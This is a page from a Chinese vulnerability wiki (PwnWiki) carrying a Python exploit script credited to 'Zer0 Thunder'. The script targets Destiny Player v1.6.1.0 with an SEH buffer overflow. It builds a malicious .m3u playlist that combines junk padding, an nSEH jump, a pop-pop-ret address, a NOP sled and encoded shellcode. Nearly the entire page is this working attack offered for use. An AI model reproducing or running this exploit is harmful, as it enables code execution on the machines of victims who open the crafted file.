免费、自由、人人可编辑的漏洞库
,
EXP
print " ||=============================================================||" print " || ||" print " || / \ 0-Exploit (Zer0 Thunder) ||" print " || \ \ ,, / /--------------------------------------------||" print " || '-.`\()/`.-' =========================== ||" print " || .--_'( )'_--. Destiny Player v1.6.1.0 ||" print " || / /` /`**`\ `\ \ SEH Buffer OverFlow (m3u) ||" print " || | | >< | | ||" print " || \ \ / / ||" print " || '.__.' ||" print " || ||" print " ||=============================================================||" filename = "des.m3u" header ="\x44\x65\x73\x74\x69\x6e\x79\x50\x6c\x61\x79\x4c\x69\x73\x74\x20\x30\x30\x30\x30\x30\x30\x30\x30\n" header +="\x23\x45\x58\x54\x4d\x33\x55\n" header +="\x23\x45\x58\x54\x49\x4e\x46\x3a\x30\x2c\n" junk = "\x41" * 5292 nseh = "\xeb\x06\x90\x90" se = "\x25\x12\xd1\x72" #0x72d11225 pop edi; pop esi; retn 0x000c nops ="\x90" * 20 shellcode=("\xda\xc1\xd9\x74\x24\xf4\x5a\x4a\x4a\x4a\x4a\x43\x43\x43\x43" "\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50" "\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38" "\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x59\x43\x30\x43\x30" "\x43\x30\x43\x50\x4b\x39\x4b\x55\x56\x51\x58\x52\x52\x44\x4c" "\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b\x56\x32" "\x45\x44\x4c\x4b\x52\x52\x47\x58\x54\x4f\x4e\x57\x50\x4a\x56" "\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x47\x4c\x45\x31" "\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54\x4d\x43" "\x31\x4f\x37\x4d\x32\x5a\x50\x56\x32\x51\x47\x4c\x4b\x56\x32" "\x54\x50\x4c\x4b\x51\x52\x47\x4c\x43\x31\x4e\x30\x4c\x4b\x47" "\x30\x54\x38\x4d\x55\x49\x50\x43\x44\x51\x5a\x45\x51\x4e\x30" "\x56\x30\x4c\x4b\x51\x58\x54\x58\x4c\x4b\x56\x38\x47\x50\x43" "\x31\x58\x53\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x47\x44\x4c\x4b" "\x43\x31\x58\x56\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e\x4c\x49" "\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x47\x48\x4d\x30\x52\x55" "\x4b\x44\x45\x53\x43\x4d\x5a\x58\x47\x4b\x43\x4d\x47\x54\x52" "\x55\x5a\x42\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31\x49\x43" "\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c\x45" "\x51\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4d\x59" "\x47\x34\x51\x34\x47\x54\x51\x4b\x51\x4b\x45\x31\x51\x49\x51" "\x4a\x56\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c\x4b" "\x45\x42\x5a\x4b\x4c\x46\x51\x4d\x52\x4a\x43\x31\x4c\x4d\x4d" "\x55\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x52\x48\x56\x51" "\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x5a\x50\x4f" "\x45\x49\x32\x50\x56\x45\x38\x4f\x56\x5a\x35\x4f\x4d\x4d\x4d" "\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d\x50\x4b" "\x4b\x4d\x30\x52\x55\x45\x55\x4f\x4b\x51\x57\x52\x33\x52\x52" "\x52\x4f\x52\x4a\x43\x30\x56\x33\x4b\x4f\x4e\x35\x45\x33\x45" "\x31\x52\x4c\x52\x43\x56\x4e\x45\x35\x54\x38\x43\x55\x43\x30" "\x41\x41") junk2 = "\x44" * (10000-len(header+junk+nseh+se+nops+shellcode)) payload = header+junk+nseh+se+nops+shellcode+junk2 textfile = open(filename , 'w') textfile.write(payload) print "\n\n+ File "+filename+" has been created" textfile.close() #E-mail : email protected #Blog/Site : zt-security.net # Sri Lankan Hackers
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库